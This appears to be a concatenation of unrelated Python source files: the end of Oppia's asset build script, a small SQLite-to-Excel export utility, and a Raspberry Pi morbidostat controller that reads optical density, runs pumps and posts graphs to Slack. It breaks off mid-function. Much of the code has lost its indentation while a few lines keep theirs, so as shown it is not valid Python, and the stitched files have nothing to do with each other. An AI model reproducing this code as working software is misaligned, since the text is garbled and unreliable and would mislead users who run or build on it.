def generate_build_directory():
"""Generates hashes for files. Minifies files and interpolates paths
in HTMLs to include hashes. Renames the files to include hashes and copies
them into build directory.
"""
print 'Building Oppia in production mode...'
# The keys for hashes are filepaths relative to the subfolders of the future
# /build folder. This is so that the replacing inside the HTML files works
# correctly.
hashes = dict()
build_tasks = collections.deque()
copy_tasks = collections.deque()
# Create hashes for all directories and files.
HASH_DIRS = [
ASSETS_DEV_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['dev_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['dev_dir'],
THIRD_PARTY_GENERATED_DEV_DIR]
for HASH_DIR in HASH_DIRS:
hashes.update(get_file_hashes(HASH_DIR))
# Save hashes as JSON and write the JSON into JS file
# to make the hashes available to the frontend.
ensure_directory_exists(HASHES_JS_FILEPATH)
with open(HASHES_JS_FILEPATH, 'w+') as hashes_js_file:
write_to_file_stream(
hashes_js_file, get_hashes_json_file_contents(hashes))
# Update hash dict with newly created hashes.js.
hashes.update({HASHES_JS_FILENAME: generate_md5_hash(HASHES_JS_FILEPATH)})
# Make sure /assets/hashes.js is available to the frontend.
_ensure_files_exist([HASHES_JS_FILEPATH])
# Build files in /extensions and copy them into staging directory.
build_tasks += generate_build_tasks_to_build_directory(
EXTENSIONS_DIRNAMES_TO_DIRPATHS, hashes)
# Minify all template files and copy them into staging directory.
build_tasks += generate_build_tasks_to_build_directory(
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS, hashes)
_execute_tasks(build_tasks)
# Copy all files from staging directory to production directory.
COPY_INPUT_DIRS = [
ASSETS_DEV_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['staging_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['staging_dir'],
THIRD_PARTY_GENERATED_DEV_DIR]
COPY_OUTPUT_DIRS = [
ASSETS_OUT_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['out_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['out_dir'],
THIRD_PARTY_GENERATED_OUT_DIR]
assert len(COPY_INPUT_DIRS) == len(COPY_OUTPUT_DIRS)
for i in xrange(len(COPY_INPUT_DIRS)):
safe_delete_directory_tree(COPY_OUTPUT_DIRS[i])
copy_tasks += generate_copy_tasks_to_copy_from_source_to_target(
COPY_INPUT_DIRS[i], COPY_OUTPUT_DIRS[i], hashes)
_execute_tasks(copy_tasks)
SOURCE_DIRS = [
ASSETS_DEV_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['dev_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['dev_dir'],
THIRD_PARTY_GENERATED_DEV_DIR]
_verify_build(SOURCE_DIRS, COPY_OUTPUT_DIRS, hashes)
# Clean up un-hashed hashes.js.
safe_delete_file(HASHES_JS_FILEPATH)
print 'Build completed.'
def build():
"""The main method of this script.
Creates a third-party directory where all the JS and CSS dependencies are
built and stored. Depending on the options passed to the script, might also
minify third-party libraries and/or generate a build directory.
"""
parser = optparse.OptionParser()
parser.add_option(
'--prod_env', action='store_true', default=False, dest='prod_mode')
parser.add_option(
'--minify_third_party_libs_only', action='store_true', default=False,
dest='minify_third_party_libs_only')
options = parser.parse_args()[0]
# Regenerate /third_party/generated from scratch.
safe_delete_directory_tree(THIRD_PARTY_GENERATED_DEV_DIR)
build_third_party_libs(THIRD_PARTY_GENERATED_DEV_DIR)
# If minify_third_party_libs_only is set to True, skips the rest of the
# build process once third party libs are minified.
if options.minify_third_party_libs_only and not options.prod_mode:
raise Exception(
'minify_third_party_libs_only should not be set in non-prod mode.')
if options.prod_mode:
minify_third_party_libs(THIRD_PARTY_GENERATED_DEV_DIR)
if not options.minify_third_party_libs_only:
generate_build_directory()
if __name__ == '__main__':
build()

Tally_excel_sheet.py

import xlsxwriter
import sqlite3
import os
from styling import export_path
import threading
from tkinter import messagebox
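# Exports the contents of the local TALLY table (appdata.db, located next to
# this script) to an Excel workbook at export_path (imported from styling).
# export_window() is presumably called from a Tkinter UI, since it reports the
# outcome through tkinter.messagebox.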
def export_window():
    # Run the export and report the outcome to the user.
    try:
        convert_to_excel_sheet()
        messagebox.showinfo("Export", "Export successful")
    except Exception:
        messagebox.showerror("Export", "Export unsuccessful")
def convert_to_excel_sheet():
    # Dump every row of the TALLY table into an .xlsx workbook at export_path.
    workbook = xlsxwriter.Workbook(export_path)
    worksheet = workbook.add_worksheet()
    row = 0
    column = 0
    DEFAULT_PATH = os.path.join(os.path.dirname(__file__), 'appdata.db')
    conn = sqlite3.connect(DEFAULT_PATH)
    c = conn.cursor()
    c.execute('SELECT * FROM TALLY')
    # Header row.
    element_list = ["Date", "Name", "Amount", "Category", "Payment", "Site"]
    for element in element_list:
        worksheet.write(row, column, element)
        column += 1
    column = 0
    row = 1
    # Data rows: the Amount column (index 2) is written with write_number so
    # Excel treats it as numeric; all other columns are written as-is.
    for item in c.fetchall():
        for column in range(6):
            if column != 2:
                worksheet.write(row, column, item[column])
            else:
                worksheet.write_number(row, column, item[2])
        row += 1
    conn.close()
    workbook.close()

master.py

#!/usr/bin/python3
import time
import sys
from datetime import datetime
import csv
import threading
from multiprocessing import Process
import configparser
import fileinput
import RPi.GPIO as GPIO
import numpy as np
import os
import board
import busio
import adafruit_ads1x15.ads1015 as ADS
import adafruit_ads1x15.ads1115 as ADS_HR
from adafruit_ads1x15.analog_in import AnalogIn
from adafruit_mcp230xx.mcp23017 import MCP23017
import digitalio
import pandas as pd
import matplotlib.pyplot as plt
# Needed for Slack Integration
# import slack
from slackclient import SlackClient
#Logging
import logging
import plotter
import glob
mstart_time = datetime.now()
config = configparser.ConfigParser()
config.read('eve-conf.ini')
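# Illustrative sketch of the eve-conf.ini layout this script expects. Section
# and key names are taken from the lookups in this file; the values shown are
# made up:
#
#   [MAIN]
#   hostname = eve-pi
#   slack_key = xoxb-0000
#   slack_channel = #eve
#   multi_icon = https://example.com/multi.png
#   temp_sensor = no
#   comb_graph = yes
#   comb_graph_freq = 30
#   save_location = /home/pi/eve-data
#
#   [CU1]
#   enabled = yes
#   a_address = 72
#   pi_pins = no
#   m_address = 32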
totsys = (''.join(config.sections())).count('CU')
actsys = []
for sysiter in range(totsys):
if config['CU' + str(sysiter+1)].getboolean('enabled'):
actsys.append(sysiter+1)
# slack_client = slack.WebClient(token = config['MAIN']['slack_key'])
slack_client = SlackClient(config['MAIN']['slack_key'])
if slack_client.rtm_connect():
print ('Multiplexer Started.')
if (totsys == 1):
multimess = slack_client.api_call(
"chat.postMessage",
username = config['MAIN']['hostname'],
icon_url = config['MAIN']['multi_icon'],
channel=config['MAIN']['slack_channel'],
text = mstart_time.strftime('Started at %H:%M:%S on %a - %b %d, %Y. There is ' + str(totsys) + ' system configured.')
)
else:
multimess = slack_client.api_call(
"chat.postMessage",
username = config['MAIN']['hostname'],
icon_url = config['MAIN']['multi_icon'],
channel=config['MAIN']['slack_channel'],
text = mstart_time.strftime('Started at %H:%M:%S on %a - %b %d, %Y. There are ' + str(totsys) + ' systems configured.')
)
else:
sys.exit("No connection to Slack.")
chanid = multimess['channel']
multits = multimess['ts']
i2c_lock = [0]*totsys
i2c_q = []
graph_lock = [0]*totsys
graph_q = []
morbidostats = list()
comb_mesg = []
comb_saveloc = ''
comb_lat_sw = ['First','']
if config['MAIN'].getboolean('temp_sensor'): temp = 0.0
odcsvs = []
pumpcsvs = []
def IC_init():
adc = list()
gpioe = list()
adc_add = list()
gpio_add = list()
for sysitr in range(totsys):
sysnum = sysitr + 1
confsec = 'CU' + str(sysnum)
if config[confsec].getboolean('enabled'):
adc_add.append(config[confsec].getint('a_address'))
if not config[confsec].getboolean('Pi_pins'):
gpio_add.append(config[confsec].getint('m_address'))
adc_add = list(set(adc_add))
gpio_add = list(set(gpio_add))
i2c = busio.I2C(board.SCL, board.SDA)
if adc_add:
for add in adc_add:
if config['MAIN'].getboolean('ads1115'):
adc.append(ADS_HR.ADS1115(i2c, address= add))
else:
adc.append(ADS.ADS1015(i2c, address= add))
if gpio_add:
for add in gpio_add:
gpioe.append(MCP23017(i2c, address=add))
return {'adc':adc, 'gpioe':gpioe, 'adc_add':adc_add, 'gpio_add':gpio_add}
def eve_starter():
for sysitr in range(totsys):
sysnum = sysitr + 1
confsec = 'CU' + str(sysnum)
if config[confsec].getboolean('enabled') is True:
print (confsec + ' enabled.')
if config['MAIN'].getboolean('repeat1_evar'):
morbidostats.append([Morbidostat([sysnum, 1], len(actsys), chips, slack_client), sysnum])
else:
morbidostats.append([Morbidostat([sysnum, sysnum], len(actsys), chips, slack_client), sysnum])
#Morbidostat(sysnum)
# thread.join
else:
print (confsec + ' not enabled. Skipping.')
slackms = slack_client.api_call(
"chat.postMessage",
username = config['MAIN']['hostname'],
icon_url = config['MAIN']['multi_icon'],
channel = config['MAIN']['slack_channel'],
text = confsec + ' is not enabled. Skipping.'
)
print ('Starting CUs')
for starti in range(len(morbidostats)):
morbidostats[starti][0].start()
if config['MAIN'].getboolean('comb_graph') and len(actsys) > 1:
combgen = slack_client.api_call(
"chat.postMessage",
username = config['MAIN']['hostname'],
icon_url = config['MAIN']['multi_icon'],
channel = config['MAIN']['slack_channel'],
text = 'Combined Graphs'
)
comblat = slack_client.api_call(
"chat.postMessage",
username = config['MAIN']['hostname'],
icon_url = config['MAIN']['multi_icon'],
channel = config['MAIN']['slack_channel'],
text = 'Latest Combined Graphs'
)
global comb_mesg
comb_mesg = [combgen['ts'], comblat['ts']]
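# Inferred queue formats (based on how the worker loops below consume them):
# - graph_q entries are either the string 'C' (regenerate the combined graphs)
#   or an index into `morbidostats` whose OD graph should be redrawn.
# - i2c_q entries are indexable (e.g. a two-character string such as '0O'):
#   element 0 is a system index into `morbidostats` and element 1 is 'O'
#   (take an OD reading) or 'C' (run the control algorithm).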
def graph_controller():
while True:
        if len(graph_q) == 0:
time.sleep(20)
else:
            if graph_q[0] == 'C':
comb_grapher()
else:
morbidostats[graph_q[0]][0].graphOD()
graph_q.pop(0)
def i2c_controller():
while True:
        if len(i2c_q) == 0:
time.sleep(0.05)
else:
            if i2c_q[0][1] == 'O':
                morbidostats[int(i2c_q[0][0])][0].get_OD()
            elif i2c_q[0][1] == 'C':
morbidostats[int(i2c_q[0][0])][0].control_alg()
i2c_q.pop(0)
def live_plotter():
max_time = 0
for sysitr in range(totsys):
sysnum = sysitr + 1
confsec = 'CU' + str(sysnum)
if config[confsec].getboolean('enabled') is True:
temp_time = config[confsec].getfloat('time_between_saves')
if temp_time > max_time:
max_time = temp_time
time.sleep(max_time*60+5)
global odcsvs
global pumpcsvs
for starti in range(len(morbidostats)):
temp_locs = morbidostats[starti][0].file_locs()
odcsvs.append(temp_locs['ods'])
pumpcsvs.append(temp_locs['pumps'])
Process(target = plotter.Plotter, args = (actsys, odcsvs, pumpcsvs, config['MAIN']['hostname'])).start()
if config['MAIN'].getboolean('comb_graph') and len(actsys) > 1: threading.Thread(target = comb_graph_scheduler).start()
def comb_graph_scheduler():
global comb_saveloc
root_dir = config['MAIN']['save_location']
comb_saveloc = root_dir + '/Combined/' + str(datetime.now()) + '/'
os.makedirs(comb_saveloc)
while True:
time.sleep(config['MAIN'].getfloat('comb_graph_freq')*60)
global graph_q
graph_q.append('C')
def comb_grapher():
ods = []
leg = []
print('Generating Combined Graphs')
fig = plt.figure(dpi=140)
ax = plt.gca()
for i in actsys: leg.append('CU'+str(i))
for i in odcsvs:
ods.append(pd.read_csv(i,index_col='hour'))
ods[-1][['average']].plot(ax=ax,figsize=(7,5))
ax.legend(leg)
ax.set_ylabel('Raw OD')
ax.set_xlabel('Time(h)')
global comb_saveloc
fig.savefig(comb_saveloc + 'RawOD.png')
plt.close('all')
fig = None; ax = None
fig2 = plt.figure(dpi=140)
ax2 = plt.gca()
for i in ods:
i[['average']].divide(float(i.iloc[-1][['maxod']])).plot(ax=ax2,figsize=(7,5))
ax2.legend(leg)
ax2.set_ylabel('Scaled OD')
ax2.set_xlabel('Time(h)')
fig2.savefig(comb_saveloc + 'ScaledOD.png')
plt.close('all')
fig2 = None; ax2 = None
global comb_mesg
global comb_lat_sw
with open(comb_saveloc + 'RawOD.png', "rb") as file_content:
combgen_pic = slack_client.api_call(
"files.upload",
channels = config['MAIN']['slack_channel'],
thread_ts = comb_mesg[0],
title = "RawOD",
file = file_content
)
with open(comb_saveloc + 'ScaledOD.png', "rb") as file_content:
combgen_pics = slack_client.api_call(
"files.upload",
channels = config['MAIN']['slack_channel'],
thread_ts = comb_mesg[0],
title = "ScaledOD",
file = file_content
)
    if comb_lat_sw[0] == 'First':
with open(comb_saveloc + 'RawOD.png', "rb") as file_content:
comblat_pic = slack_client.api_call(
"files.upload",
channels = config['MAIN']['slack_channel'],
thread_ts = comb_mesg[1],
title = "RawOD",
file = file_content
)
with open(comb_saveloc + 'ScaledOD.png', "rb") as file_content:
comblat_pics = slack_client.api_call(
"files.upload",
channels = config['MAIN']['slack_channel'],
thread_ts = comb_mesg[1],
title = "RawOD",
file = file_content
)
comb_lat_sw = [comblat_pic['file']['shares']['public'][chanid][0]['ts'], comblat_pics['file']['shares']['public'][chanid][0]['ts']]
else:
delcomb = slack_client.api_call(
"chat.delete",
channel = chanid,
ts = comb_lat_sw[0]
)
delcombs = slack_client.api_call(
"chat.delete",
channel = chanid,
ts = comb_lat_sw[1]
)
with open(comb_saveloc + 'RawOD.png', "rb") as file_content:
comblat_pic = slack_client.api_call(
"files.upload",
channels = config['MAIN']['slack_channel'],
thread_ts = comb_mesg[1],
title = "RawOD",
file = file_content
)
with open(comb_saveloc + 'ScaledOD.png', "rb") as file_content:
comblat_pics = slack_client.api_call(
"files.upload",
channels = config['MAIN']['slack_channel'],
thread_ts = comb_mesg[1],
title = "RawOD",
file = file_content
)
comb_lat_sw = [comblat_pic['file']['shares']['public'][chanid][0]['ts'], comblat_pics['file']['shares']['public'][chanid][0]['ts']]
def slackresponder():
while True:
try:
events = slack_client.rtm_read()
for event in events:
for sysitr in range(len(morbidostats)):
sysnum = morbidostats[sysitr][1]
evename = 'CU' + str(sysnum)
if (
event.get('channel') == chanid and
event.get('text') == evename and
event.get('thread_ts') == multits and
event.get('type') == 'message'
):
# print(event)
respmsg = slack_client.api_call(
"chat.postMessage",
username = 'Multiplexer',
icon_url = config['MAIN']['multi_icon'],
                            channel=chanid,
text = 'Generating Graphs for ' + evename,
thread_ts= multits
)
morbidostats[sysitr][0].graphOD()
time.sleep(60)
except KeyboardInterrupt:
break
except Exception as e:
# slack_client.api_call(
# "chat.postMessage",
# username = 'Multiplexer',
# icon_url = config['MAIN']['multi_icon'],
# channel=mchan,
# text = 'Slack Reponder *o*',
# thread_ts= multits
# )
# slack_client.api_call(
# "chat.postMessage",
# username = 'Multiplexer',
# icon_url = config['MAIN']['multi_icon'],
# channel=mchan,
# text = e,
# thread_ts= multits
# )
pass
# def temp_runner():
# if config['MAIN'].getboolean('temp_sensor'):
# while True:
# i2c_q.append('TT')
# time.sleep(3)
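# temp_sensor_func polls a DS18B20-style 1-Wire temperature sensor through the
# Linux w1 sysfs interface (/sys/bus/w1/devices/28*/w1_slave): it waits for the
# CRC check line to end in 'YES', parses the 't=' millidegree value, and
# updates the module-level `temp` roughly every 3 seconds.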
def temp_sensor_func():
base_dir = '/sys/bus/w1/devices/'
device_folder = glob.glob(base_dir + '28*')[0]
device_file = device_folder + '/w1_slave'
while True:
f = open(device_file, 'r')
lines = f.readlines()
f.close()
        while lines[0].strip()[-3:] != 'YES':
            time.sleep(0.2)
            with open(device_file, 'r') as f:
                lines = f.readlines()
equals_pos = lines[1].find('t=')
if equals_pos != -1:
temp_string = lines[1][equals_pos+2:]
global temp
temp = float(temp_string) / 1000.0
time.sleep(3)
class Morbidostat:
def __init__(self, sysnum, actsys, chips, slack_client):
self.printing = False
self.sysnum = sysnum[0]
self.varnum = sysnum[1]
self.actsys = actsys
self.adc= chips['adc']
self.gpioe = chips['gpioe']
self.adc_add = chips['adc_add']
self.gpio_add = chips['gpio_add']
self.sysstr = 'CU' + str(self.sysnum)
self.varstr = 'CU' + str(self.varnum)
self.threads = {}
self.thread_locks = {'save' : threading.Lock(), 'adc' : threading.Lock(), 'dynL' : threading.Lock(), 'control_alg' : threading.Lock(), 'graphs' : threading.Lock(), 'threads' : threading.Lock()}
self.config = configparser.ConfigParser()
self.config.read('eve-conf.ini')
# Define Experiment Variables
self.time_between_pumps = self.config[self.varstr].getfloat('time_between_pumps')
self.OD_thr = self.config[self.varstr].getfloat('OD_thr')
self.OD_thr_set = False
self.OD_min = self.config[self.varstr].getfloat('OD_min')
self.OD_err = self.config[self.varstr].getfloat('OD_error')
self.time_between_ODs = self.config[self.varstr].getfloat('time_between_ODs') # how often to gather OD data, in seconds
self.time_between_graphs = self.config[self.varstr].getfloat('time_between_graphs') # how often to graph, in minutes
# OD_thr is the threshold above which to activate drug pump [vish bench tests: empty: 3.5V, Clear Vial: 0.265V, Very Cloudy Vial: 2.15V]
#time_between_writes = 1 # how often to write out OD data, in minutes
#loops_between_writes = (time_between_writes*60)/time_between_ODs # time bewteen writes in loops
self.time_between_saves = self.config[self.varstr].getfloat('time_between_saves')
# Set Up I2C to Read OD Data
# Create the I2C bus
self.P_drug_times = self.config[self.varstr].getfloat('P_drug_times')
self.drug_pump_flo_rate = self.config[self.varstr].getfloat('drug_pump_flo_rate')
self.P_nut_times = self.config[self.varstr].getfloat('P_nut_times')
self.nut_pump_flo_rate = self.config[self.varstr].getfloat('nut_pump_flo_rate')
self.P_waste_times = self.config[self.varstr].getfloat('P_waste_times')
self.waste_pump_flo_rate = self.config[self.varstr].getfloat('waste_pump_flo_rate')
self.running_data = [] # the list which will hold our 2-tuples of time and OD
self.pump_data = []
self.OD_tmplist = []
self.pump_tmplist = []
self.hr_OD_tmplist = []
self.hr_pump_tmplist = []
self.root_dir = self.config['MAIN']['save_location']
# self.currOD = np.zeros(num_cham)
self.currOD = 0
# averaged OD value
self.scaling = self.config[self.varstr].getboolean('scaling')
self.avOD = 0
self.maxOD = 0
self.OD_av_length = self.config[self.varstr].getint('OD_av_length')
# OD averaging buffer
self.avOD_buffer = [0] * self.OD_av_length #need to change for multiplexing
self.thresh_check = self.config[self.varstr].getfloat('time_thresh')
self.growthOD = []
self.growthrate = []
self.growthrate2 = []
self.growthrate_t = []
self.avefac = 30
self.instant_gr = 0
self.instant_gr2 = 0
self.graph_loops = self.actsys * self.config['MAIN'].getint('graph_resolution_fac')
self.elapsed_loop_time = 0
self.loops = 0
self.last_dilutionOD = 0
self.nut = 0
self.drug = 1
self.waste = 2
self.max_nut = self.nut
self.max_drug = self.drug
self.max_waste = self.waste
self.vial_drug_mass = 0
self.culture_vol = self.config[self.varstr].getint('culture_vol')
self.drug_flo_rate = self.config[self.varstr].getint('drug_flo_rate')
self.nut_flo_rate = self.config[self.varstr].getint('nut_flo_rate')
self.waste_flo_rate = self.config[self.varstr].getint('waste_flo_rate')
self.pump_act_times = []
self.dil_rate = 0
self.max_dil_rate = 0
self.temp_sensor = self.config['MAIN'].getboolean('temp_sensor')
self.total_time = self.config[self.varstr].getfloat('Exp_time_hours')*3600 #in seconds
self.loops_between_ODs = 1
self.loops_between_pumps = (self.time_between_pumps*60)/self.time_between_ODs # time between pumps in loops
# num_cham = 1 # number of morbidostat vials being used
self.photod = AnalogIn(self.adc[self.adc_add.index(self.config[self.sysstr].getint('a_address'))], getattr(ADS,'P'+ str(self.config[self.sysstr].getint('Analogin'))))
# Setup the GPIO Pins to Control the Pumps
self.pipins = self.config[self.sysstr].getboolean('pi_pins')
self.P_drug_pins = self.config[self.sysstr].getint('P_drug_pins')
self.P_nut_pins = self.config[self.sysstr].getint('P_nut_pins')
self.P_waste_pins = self.config[self.sysstr].getint('P_waste_pins')
self.P_LED_pins = self.config[self.sysstr].getint('P_led_pins')
self.pin_list = [self.P_drug_pins, self.P_nut_pins, self.P_waste_pins, self.P_LED_pins]
self.ledind = self.config[self.sysstr]['P_ind_pins'].isdigit()
if self.ledind:
self.P_ind_pins = self.config[self.sysstr].getint('P_ind_pins')
self.pin_list.append(self.P_ind_pins)
self.init_pins(self.pin_list)
self.init_time = datetime.now()
self.drug_name = self.config[self.varstr]['drug']
self.drug_conc = self.config[self.varstr].getfloat('drug_conc')
self.drug_vol = self.config[self.varstr].getfloat('drug_vol')
self.slack_client = SlackClient(self.config['MAIN']['slack_key'])
# self.slack_client = slack.WebClient(token = config['MAIN']['slack_key'])
self.slack_usericon = self.config[self.sysstr]['slack_icon']
self.chan = self.config['MAIN']['slack_channel']
if self.P_drug_times * self.drug_pump_flo_rate != self.P_waste_times * self.waste_pump_flo_rate or self.P_nut_times * self.nut_pump_flo_rate != self.P_waste_times * self.waste_pump_flo_rate:
print('[%s] WARNING: Net volume of the CU will change over time with the currently configured pump times.' % self.sysstr)
volwarn = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = 'WARNING: Net volume of the CU will change over time with the currently configured pump times.'
)
initmsg = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = self.init_time.strftime('Initialized at %H:%M:%S')
)
def start(self):
self.start_time = datetime.now()
        if self.root_dir[-1] == '/':
            self.root_dir = self.root_dir[:-1]
os.makedirs(self.root_dir + "/" + self.sysstr + "/" + str(self.start_time))
# self.elogr = logging.getLogger('self.elogr')
# self.elogr.setLevel(logging.DEBUG)
# self.elogrfh = logging.FileHandler('%s/%s/%s/exceptions.txt' % (self.root_dir, self.sysstr, self.start_time))
# self.elogrfh.setFormatter("%(asctime)s — %(name)s — %(levelname)s — %(message)s")
# self.elogr.addHandler(self.elogrfh)
# self.ilogr = logging.getLogger('self.ilogr')
# self.ilogr.setLevel(logging.INFO)
# self.ilogrfh = logging.FileHandler('%s/%s/%s/info.txt' % (self.root_dir, self.sysstr, self.start_time))
# self.ilogrfh.setFormatter("%(asctime)s — %(name)s — %(levelname)s — %(message)s")
# self.ilogr.addHandler(self.ilogrfh)
self.outfile_OD = "%s/%s/%s/ODdata_%s.csv" % (self.root_dir, self.sysstr, self.start_time, self.start_time)
file = open(self.outfile_OD, 'a')
wr = csv.writer(file)
# wr.writerow(['Current OD', 'Average OD','OD Timing'])
if self.temp_sensor:
wr.writerow(['current','average','maxod','time','hour','temp','threads','min'])
else:
wr.writerow(['current','average','maxod','time','hour','threads','min'])
file.close()
self.outfile_pump = "%s/%s/%s/pump_%s.csv" % (self.root_dir, self.sysstr, self.start_time, self.start_time)
file = open(self.outfile_pump, 'a')
wr = csv.writer(file)
# wr.writerow(['Nutrient Pump', 'Drug Pump','Waste Pump','Pump Timing', 'Drug Mass'])
wr.writerow(['media', 'drug','waste','pump_time','hour','vial_drug_mass','dil_rate'])
file.close()
#Detailed Files
self.hr_outfile_OD = "%s/%s/%s/hr_ODdata_%s.csv" % (self.root_dir, self.sysstr, self.start_time, self.start_time)
file = open(self.hr_outfile_OD, 'a')
wr = csv.writer(file)
# wr.writerow(['Current OD', 'Average OD','OD Timing'])
if self.temp_sensor:
wr.writerow(['current','average','maxod','time','hour','temp','threads','min'])
else:
wr.writerow(['current','average','maxod','time','hour','threads','min'])
file.close()
self.hr_outfile_pump = "%s/%s/%s/hr_pump_%s.csv" % (self.root_dir, self.sysstr, self.start_time, self.start_time)
file = open(self.hr_outfile_pump, 'a')
wr = csv.writer(file)
# wr.writerow(['Nutrient Pump', 'Drug Pump','Waste Pump','Pump Timing', 'Drug Mass'])
wr.writerow(['media', 'drug','waste','pump_time','hour','vial_drug_mass','dil_rate'])
file.close()
#TURN ON THE FAN HERE
# print('Experiment begun at %02s:%02s:%02s' % (self.start_time.hour, self.start_time.minute, self.start_time.second))
print(self.start_time.strftime(self.sysstr + ' started at %H:%M:%S on %a - %b %d, %Y'))
# self.ilogr.info(self.start_time.strftime(self.sysstr + ' started at %H:%M:%S on %a - %b %d, %Y'))
threading.Thread(target=self.on_timer).start()
self.initalmessage = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = self.start_time.strftime('Experiment started at %H:%M:%S on %a - %b %d, %Y')
)
self.recgra = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = self.start_time.strftime('Most recent graphs')
)
# self.history = self.slack_client.api_call("channels.history", channel=self.chanid, count = 1)
# self.threadts = self.history['messages'][0]['ts']
self.chanid = self.initalmessage['channel']
self.threadts = self.initalmessage['ts']
self.recgrats = self.recgra['ts']
self.firstrec = True
self.selection = self.config[self.varstr]['selection_alg']
self.vial_conc = self.config[self.varstr].getfloat('vial_conc')
def init_pins(self,pin_list):
if self.pipins:
GPIO.setmode(GPIO.BCM)
for pin in pin_list:
GPIO.setup(pin, GPIO.OUT)
else:
self.pins = [None]*(max(pin_list)+1)
self.mcp = self.gpioe[self.gpio_add.index(self.config[self.sysstr].getint('m_address'))]
for pin in self.pin_list:
self.pins[pin] = self.mcp.get_pin(pin)
self.pins[pin].direction = digitalio.Direction.OUTPUT
self.pins[pin].value = False
def get_OD(self):
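# Pulse the measurement LED (plus the indicator LED when configured), read the
# photodiode voltage from the ADC as the current OD, then update the rolling
# average buffer and the running maximum. The 'adc' lock is acquired by the
# caller before this read is queued and released here once the reading is done.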
print_buffer = 0
self.init_pins([self.P_LED_pins, self.P_ind_pins]) if self.ledind else self.init_pins([self.P_LED_pins])
try:
if self.pipins:
GPIO.output(self.P_LED_pins,1)
if self.ledind: GPIO.output(self.P_ind_pins,1)
else:
self.pins[self.P_LED_pins].value = True
if self.ledind: self.pins[self.P_ind_pins].value = True
time.sleep(0.1)
self.currOD = self.photod.voltage #np.asarray(self.value)#[0]
time.sleep(0.1)
if self.pipins:
GPIO.output(self.P_LED_pins,0)
if self.ledind: GPIO.output(self.P_ind_pins,0)
else:
self.pins[self.P_LED_pins].value = False
if self.ledind: self.pins[self.P_ind_pins].value = False
except:
print ('[%s] OD - WARNING ADC REQUEST CRASHED' % self.sysstr)
pass
self.avOD_buffer = self.avOD_buffer + [self.currOD]
self.avOD_buffer.pop(0)
self.avOD = sum(self.avOD_buffer)/len(self.avOD_buffer)
if self.avOD > self.maxOD: self.maxOD = self.avOD
self.thread_locks['adc'].release()
def pump_on(self,pump):
if self.pipins:
GPIO.output(pump, 1)
else:
self.pins[pump].value = True
print('[%s] Turning on pump %s' % (self.sysstr,pump))
def pump_off(self,pump):
if self.pipins:
GPIO.output(pump, 0)
else:
self.pins[pump].value = False
print('[%s] Turning off pump %s' % (self.sysstr,pump))
def all_pump_off(self):
if self.pipins:
for i in self.pin_list:
GPIO.output(i, 0)
else:
for i in self.pin_list:
self.pins[i].value = False
print('[%s] Turning off all pumps' % self.sysstr)
def file_locs(self):
return {'ods':self.outfile_OD, 'pumps': self.outfile_pump}
def bufferdata(self):
if self.temp_sensor:
global temp
odlist = [self.currOD, self.avOD, self.maxOD, self.nows, (self.elapsed_time.total_seconds())/3600, temp, self.active_threads, self.OD_min]
self.hr_OD_tmplist.append(odlist)
else:
odlist = [self.currOD, self.avOD, self.maxOD, self.nows, (self.elapsed_time.total_seconds())/3600, self.active_threads, self.OD_min]
self.hr_OD_tmplist.append(odlist)
pulist = [self.nut,self.drug,self.waste,self.nows,(self.elapsed_time.total_seconds())/3600,self.vial_drug_mass,self.dil_rate]
self.hr_pump_tmplist.append(pulist)
if self.max_nut < self.nut: self.max_nut = self.nut
if self.max_drug < self.drug: self.max_drug = self.drug
if self.max_waste < self.waste: self.max_waste = self.waste
if self.max_dil_rate < self.dil_rate: self.max_dil_rate = self.dil_rate
self.nut = 0
self.drug = 1
self.waste = 2
if (self.loops % self.graph_loops) == 0:
pulist = [self.max_nut,self.max_drug,self.max_waste,self.nows,(self.elapsed_time.total_seconds())/3600,self.vial_drug_mass,self.max_dil_rate]
self.OD_tmplist.append(odlist)
self.pump_tmplist.append(pulist)
self.max_nut = self.nut
self.max_drug = self.drug
self.max_waste = self.waste
self.max_dil_rate = self.dil_rate
def savefunc(self):
self.thread_locks['save'].acquire()
self.bufferdata()
with open(self.hr_outfile_OD, 'a') as file:
wr = csv.writer(file)
wr.writerows(self.hr_OD_tmplist)
with open(self.hr_outfile_pump, 'a') as file:
wr = csv.writer(file)
wr.writerows(self.hr_pump_tmplist)
with open(self.outfile_OD, 'a') as file:
wr = csv.writer(file)
wr.writerows(self.OD_tmplist)
with open(self.outfile_pump, 'a') as file:
wr = csv.writer(file)
wr.writerows(self.pump_tmplist)
self.OD_tmplist = []
self.pump_tmplist = []
self.hr_OD_tmplist = []
self.hr_pump_tmplist = []
self.thread_locks['save'].release()
def graphOD(self):
print('[%s] Generating graph' % self.sysstr)
try:
elapmsg = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = ('Elapsed Time: %s ; OD = %.3f' % (self.secondsToText(int(self.elapsed_time.total_seconds())),self.currOD)),
thread_ts = self.threadts
)
allODs = pd.read_csv(self.outfile_OD, index_col='hour')
if self.scaling: allODs[['average']] = allODs[['average']]/float(allODs[['maxod']].iloc[-1])
if self.scaling: allODs[['min']] = allODs[['min']]/float(allODs[['maxod']].iloc[-1])
# allODs['hour'] = allODs['time'] - allODs['time'].iloc[0]
# allODs['hour'] = allODs['hour'].divide(3600)
# allODs.set_index('hour')
# print(allODs)
#fig = plt.figure(dpi=1000)
plt.rcParams["figure.dpi"] = 200
ODplt = (allODs[['average']]).plot() #figsize=(10,10) in the plot
# ODplt = (allODs[['current']]).plot() #figsize=(10,10) in the plot
ODfig = ODplt.get_figure()
